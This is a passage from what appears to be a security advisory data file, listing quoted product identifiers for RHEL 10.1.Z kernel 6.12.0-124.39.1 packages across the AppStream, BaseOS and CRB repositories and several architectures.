"AppStream-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.src",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-doc-0:6.12.0-124.39.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.src",
"CRB-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-doc-0:6.12.0-124.39.1.el10_1.noarch",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
